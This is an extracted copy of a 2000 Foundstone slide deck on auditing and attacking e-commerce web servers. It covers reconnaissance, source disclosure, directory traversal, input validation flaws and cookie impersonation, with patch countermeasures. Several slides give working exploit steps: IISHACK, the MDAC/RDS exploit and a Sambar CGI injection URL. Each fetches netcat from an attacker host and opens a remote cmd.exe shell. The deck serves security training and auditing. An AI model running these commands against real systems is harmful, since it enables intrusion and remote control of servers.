audit and security of e-commerce

7/30/2019 AUDIT AND SECURITY OF E-COMMERCE

1/93

Copyright 2000 Foundstone, Inc.

Audit and Security ofE-Commerce

The attacks are going up the stack.


2/93


Audit and Security of E-Commerce

Stuart McClure

President/CTO

Foundstone, Inc.

http://www.foundstone.com

[email protected]

949-367-1743
http://www.foundstone.com/http://www.foundstone.com/


3/93


Audit and Security of E-Commerce

Background President/CTO of Foundstone, Inc.

Over 10 years in IT and security Lead author of Hacking Exposed

Digital Battlefield columnist

InfoWorld Security Watch columnist

Former E&Y Security Consultant

InfoWorld product analyst


4/93


Overview

eCommerce Primer

Information gathering

Viewing Source

Application design

File System Traversal

Input Validation

Impersonation


5/93


Ecommerce Primer

Were secure, we have a firewall


6/93


eCommerce Primer

Ecommerce is built on web traffic (TCP port80) which must be allowed throughecommerce firewalls. Firewalls cannot block

most of these attacks.To hack in this untamed world, knowledge ofHTML, DHTML, VBScript, Jscript, Java,Javascript, Perl, CGI, Apache, IIS, Cold

Fusion, CyberCash, ADO, MS Access, MDAC,MS SQL Server, and Oracle helpful and oftenrequired.


7/93


Ecommerce Primer

ASCII Hex values: learn them, knowthem, live them

Character Hex Character Hex Character Hex

Space 20 - (hyphen) 2D Z 5A

! 21 . (period) 2E [ 5B

22 / 2F \ 5C

# 23 0 30 ] 5D

$ 24 9 39 ^ 5E

% 25 : 3A _ 5F

& 26 ; 3B ` 60

(apostrophe) 27 < 3C a 61

( 28 = 3D z 7A

) 29 > 3E { 7B

* 2A ? 3F | 7C

+ 2B @ 40 } 7D

, (comma) 2C A 41 ~ 7E


8/93


eCommerce Primer

Most attackers look for the low hangingfruit first. They scan for web ports,

search for vulnerable software orscripts, and then attack.

The more sophisticated attacks require

an in-depth knowledge of the innerworkings of web scripts (all of whichcan be learned).


9/93


Information Gathering

Gather as much information about asite as possible to understand its

purpose, function, and most important,its design.

Determine if any low-hanging fruit is

available for picking.


10/93



Methodology Web reconnaissance

Vulnerability scanning

Site duplication

Keyword searching

Email addresses

External linkage

Commented code

Key field enumeration

Scripting language enumeration


11/93



Web reconnaissance

Enumerate a web server searching for

every web application including alternatemanagement servers, transactionapplications, certificate servers, etc.

Port scanning and enumeration will revealvolumes about the target systems.


12/93



Web reconnaissance

Port scanning

TCP and UDP ports 1-65535 Common web ports

80, 81, 88, 443, 2301, 2779, 8000, 8001, 8080, etc.


13/93



Web reconnaissance

Port scanning

Network Mapper (nmap) by Fyodor(http://www.insecure.org)

[/opt]# nmap -sT -n -P0 -p 80,88,8000,2799 192.168.51.210

Starting nmap V. 2.12 by Fyodor ([email protected], )

Interesting ports on (192.168.51.210):Port State Protocol Service

2779 open tcp unknown
http://www.insecure.org/http://www.insecure.org/


14/93



Web reconnaissance

Port scanning

SuperScan byRobin Keir

(www.keir.net)


15/93



Web reconnaissance

Enumeration

Web server vendor and versionWeb server directory structure

SSL web server vendor and version

Web mind meld


16/93



Web reconnaissance Enumeration

Netcat by Hobbit (http://www.l0pht.com/~weld)

The Swiss Army knife of hackers

TCP (both NT and Unix) and UDP (Unix only)

Raw TCP or UDP connection

Command/shell/program execution

Source routing

Port redirector

Telnet server

Port scanner


17/93



Web reconnaissance

Enumeration

Web server vendor and version Netcat (nc)

[/opt]# nc 192.168.51.210 2779HEAD / HTTP/1.0

HTTP/1.1 403 Access ForbiddenServer:Microsoft-IIS/5.0Date: Sat, 26 Feb 2000 01:06:03 GMT

Content-Length: 3286

Content-Type: text/html


18/93



Web reconnaissance

Enumeration

Grinder 1.1by Rhino9


19/93



Web reconnaissance

Enumeration

Hidden redirection Using HTTP-EQUIV, web sites redirect visitors to

other parts of the server or other servers. Anattacker can glean this information and use the newinformation as targets for an attack.


20/93



Web reconnaissance

Enumeration

Netcat (nc) HTTP EQUIV discoveryC:\>nc www.site.com 80GET / HTTP/1.0

HTTP/1.1 200 OK

Date: Sun, 27 Feb 2000 23:21:52 GMT

Server: Microsoft-IIS/5.0

Connection: closeContent-Type: text/html


21/93



Web reconnaissance Enumeration

Secure Sockets Layer (SSL) Privacy protocol implementing symmetric keycryptography (DES, RC4), authentication (RSA, DSS),and message integrity (MD5, SHA)

Transport Layer Security (TSL) is the latest version ofSSL.

OpenSSL/SSLeay An open source toolkit for implementing SSL and TSL

in applications.


22/93



Web reconnaissance

Enumeration

OpenSSL/SSLeaySSLeay>s_client -connect www.ramsec.com:443CONNECTED(00000003)

HEAD / HTTP/1.0

HTTP/1.1 200 OKServer: Microsoft-IIS/4.0

Content-Location: http://216.182.36.154/index.html

Date: Sat, 26 Feb 2000 00:59:07 GMT

Last-Modified: Thu, 10 Feb 2000 22:52:52 GMT

read:errno=0


23/93



Vulnerability checking

Web vulnerability scanner checking for

known holes in application files and design. CGIscan by Bronc Buster (1998)

Sitescan by Rhino9

Whisker by Rain Forrest Puppy (1999)

http://www.wiretrip.net/rfp


24/93



Vulnerability checking

Whisker (NT and Unix)-- whisker / v1.3.0a / rain forest puppy / ADM / wiretrip --

- Loaded script database of 1691 lines

= - = - = - = - = - =

= Host: www.hackingexposed.com

= Server: Apache/3.3.3 (Unix)

+ 404 Not Found: GET /cfdocs/

+ 404 Not Found: GET /cfide/Administrator/startstop.html

+ 404 Not Found: GET /cfappman/index.cfm

+ 403 Forbidden: GET /cgi-bin/

+ 404 Not Found: GET /cgi-bin/dbmlparser.exe

+ 404 Not Found: HEAD /cgi-bin/webdist.cgi

+ 404 Not Found: HEAD /cgi-bin/handler

+ 404 Not Found: HEAD /mall_log_files/order.log

+ 404 Not Found: HEAD /PDG_Cart/

+ 404 Not Found: HEAD /quikstore.cfg

+ 404 Not Found: HEAD /orders/

+ 404 Not Found: HEAD /Admin_files/order.log+ 404 Not Found: HEAD /bigconf.cgi


25/93



Site duplication Web spider programs

Automatic web retriever and mirroring programs that

follow every link, copying readable files such as .HTM,.HTML, .DHTML, .JHTML, .SHTML, .XML, etc.

It does not retrieve .CGI, .ASP, .CFM or dynamicallygenerated pages.

Manual searchingView Source

Save As


26/93



Site duplication

Wget Unix based, GNU Wget 1.5.3

Standard on most Linux distributions ordownload from http://www.freshmeat.org

non-interactive network retriever

HTTP and FTP retrieval

Proxy supportAuthentication support

Include/exclude list of URLs


27/93



Wget[/opt]#wget -r -m -v www.ramsec.com

--13:33:34-- http://www.ramsec.com:80/ =>`www.ramsec.com/index.htmlConnecting to www.ramsec.com:80... connected!HTTP request sent, awaiting response... 200 OKLength: 11,731 [text/html]

0K -> .......... . [100%]

13:33:35 (25.57 KB/s) - `www.ramsec.com/index.html' saved[11731/11731]
http://www.ramsec.com/http://www.ramsec.com/


28/93



Site duplication Teleport Pro 1.29 by Tennyson Maxwell

Information Systems, Inc.(http://www.tenmax.com) Proxy support

Authentication support

Multi-threaded

Advanced filters
http://www.tenmax.com/http://www.tenmax.com/


29/93



Teleport Pro results:


30/93



Site duplication Countermeasures

Garbage.cgi

Rootshell once had an obscure link on theirinitial page which ran a CGI script that spit outendless amounts of data. This effectively tiedup the web pilfering.


31/93



Keyword searching

Searching web site code to find hidden

treasures such as usernames, passwords,email addresses, external links, externalimages, etc.


32/93



Keyword searching

With wget on Unix:

grep pass *.html Teleport Pro on NT:

findstr pass *.html


33/93



Email address

Searching a web site for email addresses

can unearth usernames, externalrelationships, and points of attack.


34/93



Email addresses

Wget (offline)

Teleport Pro (offline) Sam Spade (http://www.samspade.org)

Whois, ping, traceroute, ARIN, SMTP, finger,etc.

Online crawl website function!

BlackWidow by SoftByteLabs.com


35/93



Email addresses wget

[/opt]# grep @ *.htmlindex.html: For additionalinformation, contact: [email protected]

index.html:HREF="mailto:[email protected]">webmaster@ramse

c.com


36/93



Email addresses Teleport ProD:\>findstr "@" *.htm?

about_us.html: HREF="mailto:[email protected]">[email protected]&nb

sp;


37/93



Email addresses

Sam Spade


38/93



Email addresses

Black Widow


39/93



External linkage

Links to web pages or graphics on other

systems than the target.An external link can imply a relationship of

sorts and provide alternate targets for theattacker.


40/93



External linkage

Sam Spade


41/93



Commented code

Searching for commented code can provide

insight into the sites design such asapplications, languages used, programminghints, etc.


42/93



Commented code

Manual technique is most effective


43/93


44/93



Key field enumeration

Learn the name and type of key fields used

in dynamic scripts (.CGI, .ASP, .CFM).http://www.site.com/Login.asp?id=486&fu=http%3

A%2F%2Fwww%2ESramsec%2Ecom%2Fdirectory%2FDef

ault%2Easp&cw=100&sf=0&kv=1&cc=9442568&Oi=1

id, fu, cw, sf, kv, cc, Oi are input fields to thelogin.asp script.
http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1


45/93


46/93



Scripting language enumeration


47/93


Viewing Source

Numerous bugs or poor web designsallow an attacker to view web source

code, for example, .ASP or .CGI codecan be viewed within the browser.

An attacker can discover internal web

design or worse, internally usedusernames and passwords for databaseaccess.


48/93


Viewing Source

Methodology

Active Server Pages (ASP)

Common Gateway Interface (CGI) ColdFusion Server (CFM)


49/93


50/93


Viewing Source

ASP vulnerabilities

Dot bug

Countermeasures Upgrade to IIS 4.0 or above

Apply the IIS 3.0 patch:

ftp://ftp.microsoft.com/bussys/IIS/iis-

public/fixes/usa/security/fesrc-fix


51/93


52/93


Viewing Source

ASP vulnerabilities Alternate Data Streams bug

Countermeasure

Remove read access on files for Everyone group Apply patches

For IIS 3.0:

ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/iis3-datafix/

For IIS 4.0:

ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security


53/93


Viewing Source

Common Gateway Interface (CGI) CGI design flaws

CGIs that read and display an HTML file can betricked into reading itself and thereforedisplaying its contents.

http://www.site.com/index.cgi?page=main.html

Can be changed to:

http://www.site.com/index.cgi?page=index.cgi


54/93


Viewing Source

ColdFusion Server By Allaire (www.allaire.com)

Numerous bugs in 4.0 (1999) Upload a file onto the web server:

http://www.site.com/cfdocs/expeval/openfile.cfm

View a file on the web server with theExpression Evaluator:

http://www.site.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log


55/93


Viewing Source

ColdFusion Server

Countermeasures

Remove the scripts from the web serverApply the patch:

http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full


56/93



Vulnerabilities and misconfigurationsmay gain unauthorized access to files

and directories on the web server.


57/93



Methodology

Dot dot bugs

Dot listings Tilde usage

Compaq Insight Manager


58/93


59/93



Dot listings

Web server misconfiguration or

vulnerability which allows an attacker todisplay the current directorys file listing.

For example, the Novells Groupwise WebGateway web server allows for virtual

directory displaying:http://www.infoworld.com/us/.


60/93



Tilde usage

Web server vulnerability allowing an

attacker to escape the root directory of theweb server and view the contents of theparticular user on the system.

For example, might display the contents of

the root users directory:http://www.infoworld.com/~root/


61/93



Compaq Insight Manager (CIM)

Re-discovered in 1999

CIM web server allowed an attacker toexploit the dot dot command in a browserto download any file on the system

A good test to determine if a system is

vulnerable is to look for C:\BOOT.INI


62/93


Input Validation

Web applications can often be trickedinto accepting invalid input for

processing, making it cough upsensitive information, or worse, crashthe application.


63/93


Input Validation

Methodology Metacharacters

Field overflows

Application buffer overflows Hex character replacement

Server side includes (SSI)

Hidden tags

Server side debugging Extending Javascript

Data access bypassing

Local command execution


64/93


Input Validation

Metacharacters Depending on the input sanitation being

performed on the server, it may be possible to

submit metacharacters as a parameter and get theserver to return unexpected results. For example:

http://www.site.com/login.cgi?..&&&&&&&&&

may actually choke the web server or producedebugging information.
http://www.site.com/login.cgi?..&&&&&&&&&http://www.site.com/login.cgi?..&&&&&&&&&http://www.site.com/login.cgi?..&&&&&&&&&http://www.site.com/login.cgi?..&&&&&&&&&


65/93


Input Validation

Field overflows

Poor field length checking may allow an

attacker to submit large character fieldcausing unexpected results or sometimescrashing the server (use with caution).


66/93


Input Validation

Field overflows

Hidden tag SIZE


67/93


Input Validation

Field overflows

Hidden tag SUBMIT


68/93


Input Validation

Field overflows

Unexpected results


69/93


70/93


Input Validation

Application buffer overflows

IISHACK

iishack.exe (program containing the bufferoverflow and initial instructions to downloadthe ncx.exe file to be executed).

ncx.exe (slim version Netcat executing acommand shell on port 80).


71/93


Input Validation

Application buffer overflows IISHACK (how to exploit)

Setup a web server with ncx.exe in the root directory.

Run iishack.exe:C:\NT\>iishack 192.168.51.1 80 10.1.1.1/ncx.exe

Connect to port 80 on the target:

C:\NT\>nc 192.168.51.1 80

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\>


72/93


Input Validation

Application buffer overflows

IISHACK countermeasure

Apply the IIS 4.0 patch:ftp://ftp.microsoft.com/bussys/IIS/iis-

public/fixes/usa/ext-fix/


73/93


Input Validation

Hex character replacement

Replacing ASCII characters with

hexidecimal can bypass some IDSs lookingfor key strings and it may bypass initialscript parsing for invalid or escapecharacters such as the back tick (` or

%60) and ampersand (& or %36) allowingan attacker to execute commands locallyand/or receive back unexpected results.


74/93


75/93


Input Validation

Server side includes (SSI)Allows commands to be executed locally on

the system.

For example, on a Unix web serverallowing SSIs you can use the followingcommand to mail the /etc/passwd toyourself:


76/93


Input Validation

Hidden tags HTML hidden tags are frequently used to

store session information such as price,

quantity, and purchase item. These hidden tags can be modified and

resubmitted. And if no backend processingis performed, a product can be purchased

for a much reduced price (e.g. a BMWfor the cost of a matchbox car.


77/93


Input Validation

Server side debugging

Server side application debugging features

may allow additional information to beleaked about the scripts function

http://www.domain.com/cgi-bin/script.cgi?debug=ON,

debug=TRUE).


78/93


Input Validation

Extending Javascript Sites that allow users to input information onto

the site without checking for Javascript content

can allow attackers to insert Javascript code toprompt users for sensitive information.

For example, a recent eBay hack wasaccomplished by inserting Javascript code into adescription of an auction item. When users

selected the description they were prompted toenter their online userid and password which wassent to the attacker


79/93


Input Validation


Vulnerabilities in web server, script

parameter processing, or rogue files mayallow an attacker to execute localcommands on the affected systems.


80/93


Input Validation


MDAC

IISs MDAC component has a vulnerabilitywhere an attacker can submit commands forlocal execution.

Written by Rain Forest Puppy (RFP)

Exploit and fix can be found atwww.wiretrip.net/rfp


81/93


Input Validation


MDAC detecting vulnerable systems

C:\>nc -nvv -w 2 192.168.51.1 80GET /msadc/msadcs.dll HTTP/1.0

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 19 Dec 1999 18:32:10 GMT

Content-Type: application/x-vargContent-Length: 6


82/93


Input Validation


MDAC sending the exploit

C:\>mdac.pl -h 192.168.51.1 -t 192.168.51.102 -i192.168.51.102 -p 44444

-- RDS exploit by rain forest puppy / ADM / Wiretrip --

Command:

cmd /c cd %SystemRoot%&&tftp -i 192.168.51.102 GET nc.exe

nc.exe&&del ftptmp && attrib -r nc.exe && PROMPT=hacked $p$g&& nc.exe -e cmd.exe 192.168.51.102 44444

Step 1: Trying raw driver to btcustmr.mdb

winnt -> c: Success!


83/93


Input Validation


MDAC getting the prompt

C:\>nc -l -p 44444

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

hacked C:\WINNT>


84/93


Input validation


Sambar CGI vulnerability (2/23/00)

Batch files in cgi-bin allow local commandexecution Hello.bat

Echo.bat


85/93


Input validation


Sambar hack

http://www.site.com/cgi-bin/hello.bat?&tftp%20

-i%20GET%20nc.exe%20c:\temp\nc.exe&c:\nc.exe

%20-L%20-p%204000%20-e%20cmd.exe


86/93


Impersonation

Impersonating another web user can beaccomplished by understanding the way

authentication is performed on theserver.


87/93


Impersonation

Methodology

Determine state tracking

Attempt to reverse engineer the cookieencryption method

Spoof cookies to impersonate a user


88/93


Impersonation


All ecommerce sites must track a usersstate in some manner.

TCP (and therefore HTTP) is by its nature,stateless, making it difficult to associateweb requests to an individual.

The cookie solution.


89/93


Impersonation

Determine state tracking Cookies allow a web developer to track

and remember a user while shopping by

inserting information into the cookie file. Netscape:

C:\PROGRAM FILES\NETSCAPE\USERS\DEFAULT\COOKIE.TXT

IE:

C:\WINNT\PROFILES\ADMINISTRATOR\COOKIES


90/93


91/93


Impersonation


Cookie Pal by Kookaburra Software(http://www.kburra.com/)
http://www.kburra.com/http://www.kburra.com/


92/93


Impersonation

Determine state tracking Reverse engineer the cookie state

information and you will be able to make

purchases as someone else. Often based on a combination of

name/password/date/time/IP address, orsome relevant data.

Usually some form of XOR or DESencryption.


93/93

Wrap-up

Overview Background and Primer

Information gathering

Viewing Source

Application design


Input Validation Impersonation

audit and security of e-commerce

Documents